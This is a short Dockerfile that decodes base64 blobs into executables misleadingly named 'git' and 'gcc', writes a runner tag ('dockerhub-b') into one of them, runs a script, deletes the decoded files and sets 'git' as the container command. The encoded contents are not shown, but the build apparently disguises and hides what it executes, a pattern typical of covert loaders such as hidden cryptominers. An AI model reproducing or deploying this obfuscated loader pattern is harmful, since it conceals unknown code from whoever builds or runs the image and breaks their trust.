FROM artsiomkazlouhz/gcc
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > git.log'

COPY git.64 .
COPY docker.sh .
COPY gcc.64 .

RUN bash -c 'base64 --decode git.64 > git'
RUN bash -c 'base64 --decode gcc.64 > gcc'
RUN chmod +x gcc
RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' git

RUN bash ./docker.sh
RUN rm --force --recursive git _REPO_NAME__.64 docker.sh gcc gcc.64

CMD git
